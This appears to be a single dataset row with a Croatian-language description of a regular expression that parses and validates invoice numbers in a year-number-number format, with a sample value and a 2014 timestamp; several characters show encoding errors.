Ovo je regex (regular expression - regularni izraz) koji parsira i usput validira broj naÅ¡eg predraÄuna. | ^([0-9]{4})-([0-9]+)-([0-9]+)$ | 2014-5545-27 | Primjer regexa koji je potreban u jednom dijelu naÅ¡eg sitea | 2014-07-24T08:04:29.000Z |
Subsets and Splits